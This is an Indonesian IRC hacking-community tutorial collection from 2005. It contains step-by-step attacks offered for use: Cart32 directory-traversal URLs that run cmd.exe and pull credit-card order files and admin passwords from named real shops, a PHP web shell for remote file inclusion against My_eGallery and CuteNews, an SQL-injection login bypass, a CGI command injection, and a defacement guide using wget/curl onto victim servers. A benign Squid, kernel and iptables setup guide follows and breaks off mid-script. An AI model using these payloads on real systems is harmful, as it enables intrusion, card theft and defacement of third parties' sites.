TUTORIAL HACKING
KOMUNITAS #SOLOHACKERLINK
Allnet + Dalnet
Kumpulan tutorial ini kami persembahkan bagi anda yang pingin belajar Hacking,
Defacing, Cracking, dan yang berhubungan dengan dunia Komputer.
Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.
-ChanServ- -- Access List for [#solohackerlink] --
-ChanServ- Num Level Hostmask Since last use
-ChanServ- --- ----- -------- --------------
-ChanServ- 1 30 CoCoNuT 1h 18m 36s
-ChanServ- 2 20 Shidex 6d 2h 52m 6s
-ChanServ- 3 10 erisanthi 4w 4d 4h 9m 44s
-ChanServ- 4 25 moxff 8h 25m 27s
-ChanServ- 5 30 CiPaN-2
-ChanServ- 6 20 SouLmaTe 4d 7h 34m 36s
-ChanServ- 7 30 A-kung 2d 2h 48m 50s
-ChanServ- 8 30 hikaru 1w 2d 9h 41m 4s
-ChanServ- 9 20 kenshi 3d 3h 5m 39s
-ChanServ- 10 30 vend3r 3d 13h 54m 51s
-ChanServ- 11 20 ijoo 5d 17h 20m 27s
-ChanServ- 12 10 asLpLs 6d 3h 11m 42s
-ChanServ- 13 15 AnEuk_TeRmin4L 1d 8h 29m 53s
-ChanServ- 14 20 Viper 4d 9h 38m 44s
-ChanServ- 15 44 ToxiCity 3d 3h 24m 9s
-ChanServ- 16 10 [MICROBA] 2d 9h 21m 53s
-ChanServ- 17 14 arioo 1d 23h 26m 29s
-ChanServ- 18 45 SoniX 6h 53m 12s
-ChanServ- 19 10 mozi 3w 4d 1h 5m 39s
-ChanServ- 20 35 Chiboik 2d 2h 48m 55s
-ChanServ- 21 30 WONGEDAN 2d 14h 35m 59s
-ChanServ- 22 10 co_world 1d 9h 52m 12s
-ChanServ- 23 15 rafles 3w 1d 6h 45m 31s
-ChanServ- 24 20 gueng 4d 9h 52m 29s
-ChanServ- 25 15 H4_Kim 1h 1m 18s
-ChanServ- 26 20 djempol 3d 13h 52m 23s
-ChanServ- 27 10 maha_dewa 2d 4h 12m 40s
-ChanServ- 28 10 KuThiLaNK 1d 16m 27s
-ChanServ- 29 40 Pria 3w 10h 37m 37s
-ChanServ- 30 44 jayoes 2h 31m 18s
-ChanServ- 31 20 mikael_boloten 2d 8h 55m 50s
-ChanServ- 32 42 avantika 2w 1d 6h 38m 1s
-ChanServ- 33 40 Cybermoslem 4d 11h 25m 24s
-ChanServ- 34 25 senyum 3d 14h 47m 5s
-ChanServ- 35 44 Bamby 3d 5h 21m 46s
-ChanServ- 36 40 randyy 4d 5h 29m 45s
-ChanServ- 37 30 GeoL 3d 2h 54m 38s
-ChanServ- 38 35 skin 3h 58m 56s
-ChanServ- 39 28 padllepop 23h 42m 53s
-ChanServ- 40 48 saleho 1h 19m 17s
-ChanServ- 41 47 Kiluagank 1w 3d 11h 21m 23s
-ChanServ- 42 15 Pleky 2d 4h 11m 51s
-ChanServ- 43 10 ^YoGa^ 2w 2d 20h 46m 7s
-ChanServ- 44 50 POM_PONK 0s
-ChanServ- 45 10 ahas 8h 57m
-ChanServ- 46 49 eStI 5d 37m 6s
-ChanServ- 47 13 pingembul 2d 11h 7m 42s
-ChanServ- 48 45 garAm 4d 5h 50m 35s
-ChanServ- 49 45 OsKaDoN 2h 31m 51s
-ChanServ- 50 42 andri 23h 20m 48s
-ChanServ- 51 25 Blu3_Cyber 1d 14h 40m 29s
-ChanServ- 52 15 data_base 5w 4d 19h 27m 27s
-ChanServ- 53 48 PeNcOpEt_CiNtA 4d 23h 39m 14s
-ChanServ- 54 9 Dewa_Cinta 14h 47m 42s
-ChanServ- 55 30 RENDY_CO 6w 3d 5h 10m 35s
-ChanServ- 56 30 kethex 6w 2d 9h 52m 22s
-ChanServ- 57 15 SpY|DeR 4d 2h 31m 13s
-ChanServ- 58 35 SkyLine 1w 1d 5h 17m 58s
-ChanServ- 59 20 siti^oke
-ChanServ- 60 35 ajbtk_anton 1w 6d 8h 6m 58s
-ChanServ- 61 25 SaWeX 14w 2d 21h 24m 20s
-ChanServ- 62 15 Teguh 2w 2d 8h 29m 51s
-ChanServ- 63 15 vender 3d 14h 41m 35s
-ChanServ- 64 44 ad|fashLa 1w 8h 50m 58s
-ChanServ- 65 20 IrwansyaH 4d 14h 48m 48s
-ChanServ- 66 25 Comex 4d 5h 32m 40s
-ChanServ- 67 20 Aves 1w 1d 10h 50m 17s
-ChanServ- 68 10 Reny 3w 4d 7h 16m 19s
-ChanServ- 69 44 Malaikat^Mikhael 19h 19m 3s
-ChanServ- 70 40 BuayA 3d 12h 56m 36s
-ChanServ- 71 15 blu_smith87 1d 6h 23m 27s
-ChanServ- 72 20 ricky 11h 36m 28s
-ChanServ- 73 40 madiun 3w 5d 15h 1m 46s
-ChanServ- 74 45 solohackerlink 2w 4d 5h 5m 50s
-ChanServ- 75 20 sTeVe_YaN9_SDiKiT_ImOeT 4d 2h 32m 8s
-ChanServ- 76 15 AndyBogard 2w 2d 12h 53m 41s
-ChanServ- 77 44 cupid 19h 26m 44s
-ChanServ- 78 47 TAKESI 6s
-ChanServ- 79 20 wahyu_20 11h 15m 41s
-ChanServ- 80 20 WoNg`Edan 7h 2m 9s
-ChanServ- 81 15 GoD_Army 4d 5h 15m 12s
-ChanServ- 82 14 Pico 1d 2h 37m 59s
-ChanServ- 83 44 cOCa-cOLa 15h 20m 30s
-ChanServ- 84 20 SuPeR_MaN 9h 48m 37s
-ChanServ- -- End of list --
Cart32 v3.5a
##############################################################################
#
TUTORIAL I : Cart32 v3.5a
by : PeNcOpEt_CiNtA
Posted : 11 oktober 2005
##############################################################################
#
NB : Hanya bisa digunakan kepada beberapa situs yang memiliki kelemahan
yang sama.
Langkah 1: Dapatkan terlebih dahulu Website Cart32 v3.5a
Langkah 2: Cari di semua searc engine yang kamu ketahui.
dengan keyword " Cart32 v3.5a "
Langkah 3: Masuk ke website Cart32.exe
http://target/login/unicode/cart32.exe
(contoh : http://www.connectionsmall.com/scripts/cart32.exe/)
Langkah 4: Setelah kamu masuk kesana, akan diperlihatkan tampilan
seperti dibawah ini :
========================================
Cart32 v3.5a
Shopping Cart System for Windows
http://www.cart32.com/
Registered to Greymane ConnectionsLicense: Unlimited clients
©1996-2001 McMurtrey/Whitaker & Associates, Inc.Build 714
========================================
Langkah 4: Sekarang yang harus kamu lakukan adalah memasukkan ekstensi
berikut di akhir URL, 98% memakai #1 & #2
a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:)
b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:)
c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:)
HANYA DIGUNAKAN KADANG2!
(contoh:http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%
af../winnt/system32/cmd.exe?/c+dir+c:)
Langkah 5: Saat kamu berada di direktori utama (c:), untuk masuk ke
cc´s, masukan kembali (progra~1MWAIncCart32) ke akhir URL tadi
sehingga sekarang kamu dapat melihat seperti :
http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%
af../winnt/system32/cmd.exe?/c+dir+c:progra~1mwainccart32
Sekarang kamu dapat melihat banyak file seperti :
2814659000-001001.c32
2814659000-001002.c32
2814659000-001003.c32
Langkah 6: Copy salah satu dari nama file tersebut dan kemudian
masukkan ke akhir URL, dan akan terlihat seperti :
http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%
af../winnt/system32/cmd.exe?/c+type+c:progra~1mwainccart322814659000-001003.c32
Catatan : Diistu kamu akan melihat file lain yang berisi banyak sekali
cc´s seperti :
RONACK-orders.txt (file ini tidak berada pada situs yang khusus ini)
procure-orders.txt (file ini tidak berada pada situs yang khusus ini)
Langkah 7: Sebelum kamu mengakses tipe file yang lain, pertama kamu harus mengganti
*c+dir+c:* ke *c+type+c:*
========================================
TUTORIAL II : Cart32 v3.5a
----------------------------------------
Target: http://www.partybows.com
1. Ke http://www.partybows.com
2. Klik http://www.partybows.com/seasonal.htm
3. Isi Quantity= 1 Pokoknya kayak lu pura2x beli dan klik order
4. Maka akan kesini jadinya :
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem
5. Ubah menjadi
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error
Cart32 v3.5 Error
CART32 Build 619
The following internal error has occurred: Invalid procedure
Error Number = 5
Click Here For Possible Solutions
etc.
6. Cari log order-nya
Cart32 Setup Info and Directory
Mail Server = mail.axion.net Section=Main
AdminDir = D:securewebrootpartybowscgi-bincart32
Jadi partybows-orders.txt.
Sehingga akhirnya :
http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt
7. Atau untuk mendapatkan Password admin nyah loe tinggak ketik cart32.ini
https://secure.axionet.com/partybows/cgi-bin/cart32.ini
dengan tidak di sengaja kamu akan mendownload Password admin
yang ada di file cart32.ini nyah.
kamu akan mendapat kan password admin yang terencriptsi
lalu kamu coba mendecriptkan nyah dengan software
" Cart32decoder.exe "
8. Untuk mendapatkan data nama dan password clients pada Cart32
kamu bisa mencobanya dengan mengetik "CLIENT.DBF"
atau :
order file pada "ORDER atau ORDERS.DBF
========================================
TUTORIAL III : Cart32 v3.5a
----------------------------------------
search +/scripts/cart32.exe/
Exploitable Directories
-/scripts/cart32.ini
-/scripts/cart32.exe
-/scripts/cart32.exe/cart32clientlist
-/script/c32web.exe/ChangeAdminPassword
-/scripts/c32web.exe
-cgi-shl/c32web.exe/
Wherever there is the cart32.exe add this to the end of it /cart32clientlist
and erase the rest a menu will come up with a submit box click go
it will list ALL clients and their passwords passwords will be encrypted
after decrypting the password, go to wherever the [c32web.exe] file is
thats the instructions wit exploits what that channel we were just in called
-------------------------------------------------------------------------------------------------
Post by : PeNcOpEt_CiNtA on [ 11 November 2005 08:56:21 ]
My_eGallery security exploit
##############################################
My_eGallery security exploit
Author : PeNcOpEt_CiNtA ( seng_due@yahoo.co.id )
##############################################
Bugs File may be : displayCategory.php
Display : http://www.target.com/modules/My_eGallery/public/displayCategory.php
Note :
for attacking u must use this script, save and upload to your website.
e.g save with namefile : cmd.txt
e.g from my site : http://www.geocities.com/seng_due/script/solohackerlink.txt
---------------- script from here -----------------------------------------------------
TEST SYSTEM KEAMANAN SERVER ANDA!!!
size="1">
src="http://www.geocities.com/aritrokok/aritrokok.jpg"
# saleho PHP :
# Released by : Solohackerlink-Crew
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>
#SOLOHACKERLINK
------------------ End of Script ---------------------------------------------------------
###################################
Ok and now let´s Search your Target
###################################
1. search in all search engine e.g --> "allinurl:displayCategory.php" or "My_eGallery"
2. Get the target site like -->
http://www.target.com/modules/My_eGallery/public/displayCategory.php
3. test to attack with code :
?basepath=http://if-istp.net/cmd.txt?&cmd=uname -a;id;
4. Display attacking :
http://www.target.com/modules/My_eGallery/public/displayCategory.php?basepath=http://ifistp.
net/cmd.txt?&cmd=uname -a;id;
5. Linux and Unix command Used in here :P~ e.g : ls -al , uname -r , cat , echo , etc....
6. So, What are U waiting For !!!
Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:53:10 ]
s-cart vulnerability
##############################################
S-Cart Bugs injection
Author : PeNcOpEt_CiNtA
##############################################
Bugs File : admin page --> /admin
Display : http://target.com/s-cart/admin
1. search in all search engine e.g --> allinurl:s-cart/index.phtml or "s-cart"
2. Get the target site like --> http://www.target.com/s-cart/index.phtml
3. and now go to admin page with change the Url to :
http://www.target.com/s-cart/admin --> auto open browser with login and passwd !!!
login : admin
passwd : ´or´´=´
4. If U are lucky, u can see the admin manager, show the table Order now or Deface s-cart page.
Ok let´s to try :P~
Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:49:25 ]
display.cgi vulnerability
##############################################
Abrior´s Encore WebForum ( display.cgi )
Author : PeNcOpEt_CiNtA ( seng_due@yahoo.co.id )
Forum : #Cracked On aLL.NeT
##############################################
Bugs File : /forumcgi/display.cgi?
Display : http://www.target.com/encore/forumcgi/display.cgi?
1. search in all search engine e.g --> allinurl:forumcgi/display.cgi?
2. Get the target site like --> http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp
3. and now go to the exploit with insert this code :
&page=anonymous&file=|uname%20-a|
4. Full Display like :
http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|
uname%20-a|
5. Linux or Unix command available in here... Good Luck :P~
Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:48:30 ]
cutenews vulnerability
********************************************
PeNcOpEt_CiNtA From Solohackerlink
********************************************
bug kali ini menimpa pada cuteNews milik php dimana bug ini menimpa pada shownews.php
variabel cutepath ini sebagai eksekusi.kamu bisa menggunakan news.txt atau config.php untuk
mengetahui command dari php
oke..kita lanjut saja...
konsep hackingnya sebagai berikut:
http://target.com/cutenews/shownews.php?cutepath=http://inject.com
sekarang bagaimana kita memperoleh target tersebut???
hehehehe penasaran ya...ok..kita buka paman google, dan kasih perintah kata kunci sebagai
berikut:
inurl:cutenews/shownews.php
ntuh....banyak kan....
contohnya:
www.flip-script.com/cutenews/shownews.php
kemudian kamu ubah menjadi begini
http://www.flipscript.
com/cutenews/shownews.php?cutepath=http://geocities.com/seng_due/script/solohackerlin
k.txt?&cmd=id
hehehe dan lihat apa yang terjadi....
selanjutnya kamu bisa bereksperimen sendiri OK....
Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:43:10 ]
titip file
MENITIPKAN FILE DI SITUS YANG MEMPUNYAI CELAH KEAMANAN
(orang lain mungkin menyebutnya deface)
Hehehe, aneh yah judulnya.... Padahal orang lain mungkin akan lebih suka untuk menyebutnya
sebagai deface. Sebenarnya ada sedikit perbedaan antara deface dan menitipkan file, deface
adalah mengubah tampilan suatu situs baik halaman utama atau bukan (sifatnya agak sedikit
merusak), sedangkan menitipkan file hanya meletakkan file tersendiri di suatu situs tanpa
mengubah halaman tertentu dari situs yang disusupi.
OK... saya rasa cukup basa-basinya. Kita langsung masuk ke pembahasan utama.
Ada lumayan banyak langkah yang diperlukan untuk bisa menitipkan file di suatu situs yang
mempunyai celah keamanan.
1. Pelajari command dasar sistem operasi, baik windows maupun keluarga *nix (Linux, BSD,
MacOS, SunOS, Unix, dll)
2. Cari dan pelajari bug-bug aplikasi web yang ada.
3. Pelajari cara menggunakan search engine (terutama Google).
4. Siapkan beberapa file yang mungkin akan digunakan nantinya, lalu simpan di suatu situs (kalo
gak mampu beli yaaaa.... buat situs gratisan aja)
5. Pelajari cara mencari daftar situs di suatu server (biasanya satu situs bisa terdiri dari banyak
situs, bahkan ada yang ratusan)
1. Command dasar sistem operasi
Berikut ini akan saya jelaskan beberapa command dasar dari sistem operasi, baik windows
maupun *nix yang mungkin berguna saat menyusup ke suatu sistem nantinya.
Untuk mencoba menjalankan command-command dasar tersebut, di windows gunakan DOS
prompt, sedangkan di *nix menggunakan sh, bash, bsh dan lain-lain (command line interface).
Jika anda pengguna windows dan tetap ingin mencoba command *nix bagaimana ? Coba cari
situs-situs yang menyediakan shell gratis, yang bisa dijalankan menggunakan telnet atau putty.
DOS *NIX Keterangan
dir ls Melihat daftar file di suatu direktori
ren mv Mengganti nama file
copy cp Menggandakan file
del rm Menghapus file atau direktori
mkdir mkdir Membuat direktori baru
type cat Melihat isi suatu file
cd Cd Berpindah direktori
Pwd Melihat direktori aktif
2. Bug aplikasi web
Ada beberapa jenis bug diantaranya adalah remote command execution, file injection, sql
injection.
Contoh :
Phpbb2 remote command executuon:
http://korban.com/viewtopic.php?t=1&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%
2527&cmd=id;pwd;ls –al
Cgi remote command execution
http://korban.com/index.cgi?page=view.txt|id;pwd|
Php file injection
http://korban.com/index.php?file=http://situsmu.com/file_inject.txt?cmd=id;pwd
Asp-MsSQL Sql injection
http://korban.com/index.asp?id=1;update table set field5=’hacked’ where field1=1
Untuk mendapatkan lebih banyak bug-bug aplikasi web, silakan mengunjungi situs-situs
keamanan atau situs-situs hacker yang ada.
3. Mengunakan search engine (Google)
Google adalah mesin pencari yang sangat sering digunakan oleh hacker untuk mencari situs-situs
yang mempunyai celah keamanan. Ada beberapa option yang bisa ditambahkan pada keyword
untuk mempersempit pencarian.
Allinurl:file_manager.php Я mencari situs yang ada file file_manager.php saja
Intitle:hacked Я mencari situs yang title nya ada kata hacked
Masih ada beberapa option lagi yang bisa digunakan. Option-option tersebut bisa digunakan
bersamaan agar lingkup hasil pencarian lebih sempit lagi.
Silakan membacanya langsung di google.com atau di situs-situs hacker untuk keterangan lebih
lanjut.
4. File yang mungkin dibutuhkan
Berikut ini adalah file-file yang mungkin dibutuhkan untuk melakukan penyusupan.
Phpshell
Phpshell bisa digunakan untuk exploitasi bug file injection atau di simpan di situs yang telah
berhasil di susupi untuk menjalankan command shell dari suatu sistem yang menggunakan php
sebagai bahasa pemrograman web nya
Cgitelnet
Cgi telnet hanya bisa dijalankan jika sudah tertanam di suatu situs, fungsinya sama dengan
phpshell yaitu menjalankan command shell. Untuk situs yang menggunakan Perl.
cmdAsp
sama fungsinya dengan phpshell dan cgi telnet pada situs yang menggunakan asp
5. Mencari nama dan direktori situs lain dalam satu server
Ada beberapa cara yang bisa digunakan (*nix), dengan asumsi bahwa id yang kita dapatkan
adalah apache, nobody, httpd, atau www. Jika id yang kita dapatkan adalah nama user maka
selamat... kita bisa deface halaman utama.
a. httpd.conf
Cari file httpd.conf, dengan menjalankan perintah locate httpd.conf.
Misalkan hasilnya /etc/httpd/httpd.conf, lihat isinya dengan perintah cat /etc/httpd/httpd.conf
Jika kita beruntung maka dalam file tersebut terdapat daftar nama situs berikut direktori root nya.
Jika tidak ada, gunakan cara lain.
b. /etc/passwd
Kita bisa menggunakan file /etc/passwd untuk meraba keberadaan direktori situs
Caranya, jalankan perintah pwd, misalkan hasilnya /home/telo/public_html
Selanjutnya lihat isi file /etc/passwd dengan command cat /etc/passwd
Lihat isinya, perhatikan semua daftar user yang mengandung kata /home
Misalnya /home/user1, /home/user2
Dari sini kita hanya mendapatkan direktori root dari suatu situs, tetapi belum mengetahui nama
situsnya.
Lalu bagaimana cara untuk mengetahui? Cara manual, yaitu dengan melihat-lihat isi dari file-file
yg ada di dirrektori situs tersebut, misalkan cd /home/user1/public_html;cat index.html, cara ini
memerlukan sedikit kesabaran J
c. /home
misal hasil pwd /home/telo/public_html.
Jalankan perintah ls /home untuk melihat isi dari direktori /home
Jika ada hsailnya berarti kita cukup beruntung karena kabanyakan server tidak mengijinkan
nobody untuk melihat isi direktori tersebut.
Selanjutnya hampir sama dengan bagian b di atas, cara ini juga mirip jika kita mendapatkan hasil
pwd seperti /etc/www/vhost/teloganyong.com/httpdocs.
OK, sementara cukup perkenalannya, sekarang kita coba langsung ke kasus yang mendekati
nyata.
Sebagai gambaran, saya lebih suka jika mendapatkan bug php file injection, maka bug ini
sebagai contoh J
http://korban.com/index.php?file=http://situsmu.com/inject.txt? (jangan lupa karakter tanda tanya)
(saya anggap file inject.txt nya berupa satu textbox dan satu tombol submit)
1. Masukkan perintah id;pwd;ls –al
2. perhatikan hasilnya, selanjutnya kita anggap hasilnya id=nobody,
pwd=/home/korban/public_html, dan hasil ls –al tidak perlu disebutkan.
3. Cari tempat dimana kita diberi ijin menulis, caranya dengan menjalankan perintah
find /home/korban/public_html –perm 777 -type d
4. Jika ada daftar direktori yang muncul dari perintah no 3, berarti kita bisa menulis
5. Misalkan hasilnya /home/korban/public_html/images
6. Masukkan file yang ingin ditanamkan dengan cara menjalankan perintah
cd /home/korban/public_html/images;wget http://situsmu.com/deface.html;ls (misalnya), perintah
ls digunakan untuk memeriksa apakah file berhasil di susupkan
7. Jika berhasil maka kita bisa mengakses file tersebut ke http://korban.com/images/deface.html
8. selesai
catatan: untuk perintah memasukkan file, mungkin saja wget tidak ada atau memerlukan option
tambahan, silakan mencoba cara lain berikut ini
wget http://situsmu.com/deface.html
wget –o deface.html http://situsmu.com/deface.html
curl –o deface html http://situsmu.com/deface.html
lwp-download http://situsmu.com/deface.html
fetch http://situsmu.com/deface.html
linx http://situsmu.com/deface.html
jika masih tidak berhasil juga silakan menggunakan perintah echo untuk menulis file secara
langsung
cd /home/korban/public_html/images;echo tested by telo > telo.html;ls
http://korban.com/images/telo.html
Post by : x`shell on [ 10 November 2005 17:43:02 ]
Installasi Squid + Compile Kernel + HTB + IPTABLES
Installasi Squid + Compile Kernel + HTB + IPTABLES
==================================================
Konfigurasi ini ditujukan pada Madya (c3p0t) dan Dana (suheng) Warnet Citra Pangkalpinang dan
Warnet Speednet Pangkalpinang.
Download Source Squid :
wget -c http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE7.tar.bz2
Ekstrak Source Squid :
tar -jxf squid-2.5.STABLE7.tar.bz2
Configure Squid :
cd squid-2.5.STABLE7
pastikan paket glibc terinstall di sistem:
installpkg /mnt/cdrom/slackware/l/glibc*.tgz
./configure --prefix=/usr/local/squid
--exec-prefix=/usr/local/squid
--enable-delay-pools --enable-cache-diggests
--disable-ident-lookups --enable-async-io=16
--enable-removal-policies="lru,heap"
--enable-poll --enable-linux-netfilter
Installasi Squid:
make
make install
File squid.conf standard :
##########################
http_port 3128
icp_port 3130
hierarchy_stoplist cgi-bin ?
acl QUERY urlpath_regex cgi-bin ?
no_cache deny QUERY
cache_mem 8 MB
cache_swap_low 90
cache_swap_high 95
cache_replacement_policy lru
cache_dir ufs /usr/local/squid/var/cache 1000 16 256
cache_access_log /usr/local/squid/var/logs/access.log
cache_log /usr/local/squid/var/logs/cache.log
cache_store_log none
mime_table /usr/local/squid/etc/mime.conf
pid_filename /usr/local/squid/var/logs/squid.pid
debug_options ALL,1
ftp_user Squid@
ftp_list_width 32
ftp_passive on
dns_nameservers 127.0.0.1
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern . 0 20% 4320
acl all src 0.0.0.0/0.0.0.0
acl manager proto cache_object
acl localhost src 127.0.0.1/255.255.255.255
acl to_localhost dst 127.0.0.0/8
acl SSL_ports port 443 563 8443
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 563 # https, snews
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl CONNECT method CONNECT
http_access allow manager localhost
http_access deny manager
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
acl our_networks src 192.168.1.0/24
http_access allow our_networks
acl IIX dst_as 7713 4795 7597 4622 4787 4800
always_direct allow IIX
http_access deny all
cache_mgr webmaster
cache_effective_user squid
cache_effective_group squid
visible_hostname warnet.citra.com
httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on
################################
configurasi lainnya bisa di baca di squid.conf.default
Menjalankan squid pertama kali:
groupadd -g 8080 squid
useradd -g 8080 -u 8080 -s /bin/false -d /usr/local/squid squid
mengecek kesalahan config:
/usr/local/squid/sbin/squid -k parse
membuat directory cache:
/usr/local/squid/sbin/squid -z
Menjalankan squid :
/usr/local/squid/sbin/squid -DY
(masukkan juga di rc.local)
Compile Kernel :
================
Compile kernel digunakan untuk optimasi kernel dikemudian hari. disini kita menambahkan option
QoS untuk fasilitas bandwitdh limiter. pastikan packet Ncurse sudah terinstall
installpkg /mnt/cdrom/slackware/l/ncurse*.tgz
cd /usr/src/linux
make menuconfig
Networking options --->
QoS and/or fair queueing --->
¦ ¦ [*] QoS and/or fair queueing ¦ ¦
¦ ¦
¦ ¦
¦ ¦
¦ ¦
¦ ¦
¦ ¦
¦ ¦
¦ ¦
¦ ¦
¦ ¦
¦ ¦
¦ ¦ [*] QoS support ¦ ¦
¦ ¦ [*] Rate estimator ¦ ¦
¦ ¦ [*] Packet classifier API ¦ ¦
¦ ¦
¦ ¦
¦ ¦
¦ ¦
¦ ¦
¦ ¦
¦ ¦ [*] Traffic policing (needed for in/egress) ¦ ¦
keluar (exit) dan simpan configurasi diatas
make dep
make clean
make modules
make modules_install
make bzImage
Configurasi Bootloader
cp System.map /boot/System.map-qos
cp arch/i386/boot/bzImage /boot/vmlinuz-qos
pico /etc/lilo.conf
###########################
# Start LILO global section
boot = /dev/hda
message = /boot/boot_message.txt
prompt
timeout = 1200
# Override dangerous defaults that rewrite the partition table:
change-rules
reset
# Normal VGA console
vga = normal
# Linux bootable partition config begins
image = /boot/vmlinuz-qos
root = /dev/hda2
label = Linux-QOS
read-only
# Linux bootable partition config ends
# Linux bootable partition config begins
image = /boot/vmlinuz
root = /dev/hda2
label = Linux
read-only
# Linux bootable partition config ends
##############################
reboot
HTB Bandwitdh Managemen
=======================
Dalam percobaan ini ada 3 buah komputer.
Total Bandwith Internet downlink 64 Kbps dan upstrime tidak dibatasi
komputer 1 bernama madya dengan ip 192.168.1.2, akan di beri jatah downlink 32 Kbps
komputer 2 bernama dana dengan ip 192.168.1.3, akan di beri jatah downlink 16Kbps
komputer 3 bernama dion dengan ip 192.168.1.4, akan di beri jatah downlink 16Kbps
download HTB.INIT
wget http://aleron.dl.sourceforge.net/sourceforge/htbinit/htb.init-v0.8.5
cp htb.init-v0.8.5 /usr/sbin/htb.init
chmod 755 /usr/sbin/htb.init
membuat direktory htb
mkdir -p /etc/sysconfig/htb
pico /etc/sysconfig/htb/eth0
R2Q=1
pico /etc/sysconfig/htb/eth0-10.root
RATE=64Kbit
QUANTUM=1500
pico /etc/sysconfig/htb/eth0-10:1.madya
RATE=32Kbit
QUANTUM=1500
CEIL=64Kbit
LEAF=sfq
RULE=192.168.1.2/32,
pico /etc/sysconfig/htb/eth0-10:2.dana
RATE=16Kbit
QUANTUM=1500
CEIL=64Kbit
LEAF=sfq
RULE=192.168.1.3/32,
pico /etc/sysconfig/htb/eth0-10:3.dion
RATE=16Kbit
QUANTUM=1500
CEIL=64Kbit
LEAF=sfq
RULE=192.168.1.4/32,
Install iproute2 dari src.teras.net.id
installpkg http://src.teras.net.id/slack-pkg/iproute2-2.4.7_now_ss020116_try-i386-4.tgz
download pacth tc dari docum.org
wget http://www.docum.org/docum.org/download/tc.bz2
ekstrak tc dan copy ke /sbin/
bunzip2 tc.bz2
cp tc /sbin/
chmod 755 /sbin/tc
Compile htb.init
htb.init compile
Start htb.init
htb.init start
Jika tidak ada eror berarti anda selesai menginstall htb bandwitdh limiter, jangan lupa htb.init start
dimasukkan kedalam rc.local
IPTABLES
========
##############################################################################
###
# perintah menjalankan scripts: firewall (start|stop|restart|status) EXTIF INTIF
# contoh: "firewall start ppp0 eth0"
##############################################################################
###
#!/bin/sh
IPTABLES="/usr/sbin/iptables"
case "$1" in
stop)
echo "firewall dimatikan..!!!"
$IPTABLES -F
$IPTABLES -F -t mangle
$IPTABLES -F -t nat
$IPTABLES -X
$IPTABLES -X -t mangle
$IPTABLES -X -t nat
$IPTABLES -P INPUT ACCEPT
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P FORWARD ACCEPT
echo "...done"
;;
status)
echo $"Table: filter"
iptables --list
echo $"Table: nat"
iptables -t nat --list
echo $"Table: mangle"
iptables -t mangle --list
;;
restart|reload)
$0 stop
$0 start
;;
start)
echo "Benteng Firewall diaktifkan"
echo ""
DEFAULT_EXTIF="ppp0"
DEFAULT_INTIF="eth0"
UNIVERSE="0.0.0.0/0"
UNPRIVPORTS="1024:65535"
XWINPORTS="6000:6063"
IRCPORTS="6665,6666,6667,6668,6669,7000"
#-----Port-Forwarding Variables-----#
#For port-forwarding to an internal host, define a variable with the appropriate
#internal IP-Address here and take a look at the port-forwarding sections in the FORWARD +
#PREROUTING-chain:
#These are examples, uncomment to activate
#IP for forwarded Battlecom-traffic
#BATTLECOMIP="192.168.0.5"
#IP for forwarded HTTP-traffic
#HTTPIP="192.168.0.20"
#----Flood Variables-----#
# Overall Limit for TCP-SYN-Flood detection
TCPSYNLIMIT="5/s"
# Burst Limit for TCP-SYN-Flood detection
TCPSYNLIMITBURST="10"
# Overall Limit for Loggging in Logging-Chains
LOGLIMIT="2/s"
# Burst Limit for Logging in Logging-Chains
LOGLIMITBURST="10"
# Overall Limit for Ping-Flood-Detection
PINGLIMIT="5/s"
# Burst Limit for Ping-Flood-Detection
PINGLIMITBURST="10"
#----Automatically determine infos about involved interfaces-----#
### External Interface:
## Get external interface from command-line
## If no interface is specified then set $DEFAULT_EXTIF as EXTIF
if [ "x$2" != "x" ]; then
EXTIF=$2
else
EXTIF=$DEFAULT_EXTIF
fi
echo External Interface: $EXTIF
## Determine external IP
EXTIP="`ifconfig $EXTIF | grep inet | cut -d : -f 2 | cut -d -f 1`"
if [ "$EXTIP" = ´´ ]; then
echo "Aborting: Unable to determine the IP-address of $EXTIF !"
exit 1
fi
echo External IP: $EXTIP
## Determine external gateway
EXTGW=`route -n | grep -A 4 UG | awk ´{ print $2}´`
echo Default GW: $EXTGW
echo " --- "
### Internal Interface:
## Get internal interface from command-line
## If no interface is specified then set $DEFAULT_INTIF as INTIF
if [ "x$3" != "x" ]; then
INTIF=$3
else
INTIF=$DEFAULT_INTIF
fi
echo Internal Interface: $INTIF
## Determine internal IP
INTIP="`ifconfig $INTIF | grep inet | cut -d : -f 2 | cut -d -f 1`"
if [ "$INTIP" = ´´ ]; then
echo "Aborting: Unable to determine the IP-address of $INTIF !"
exit 1
